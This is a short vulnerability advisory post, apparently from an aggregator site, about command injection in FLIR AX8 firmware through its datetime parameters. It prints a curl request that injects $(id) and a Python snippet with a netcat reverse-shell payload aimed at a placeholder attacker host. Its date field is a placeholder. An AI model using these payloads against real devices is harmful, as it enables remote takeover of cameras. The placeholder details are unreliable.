Listen to this Post
The vulnerability in FLIR AX8 firmware (up to v1.46.16) stems from improper input validation in the `setDataTime` function within settingsregional.php. Attackers can inject malicious commands via the year, month, day, hour, or `minute` parameters, which are passed unsanitized to system commands. This allows remote execution of arbitrary code under the web server’s context. The exploit leverages HTTP requests to manipulate datetime parameters, embedding payloads like `$(command)` or backticks to trigger OS command execution. Public exploits demonstrate weaponization, and the lack of vendor patches increases risk.
DailyCVE Form:
Platform: FLIR AX8
Version: ≤1.46.16
Vulnerability: Command Injection
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch ETA: Q4 2023
What Undercode Say:
curl -X POST "http://target/endpoint" --data "year=2023&month=1&day=1&hour=12&minute=$(id)"
payload = "; nc -e /bin/sh attacker_ip 4444"
requests.post(target_url, data={"minute": payload})
Exploit:
- Remote command execution via datetime parameters.
- Public PoCs available (GitHub).
Protection from this CVE:
- Disable affected endpoints.
- Apply input sanitization.
- Await vendor patch.
Impact:
- Full system compromise.
- Unauthorized data access.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
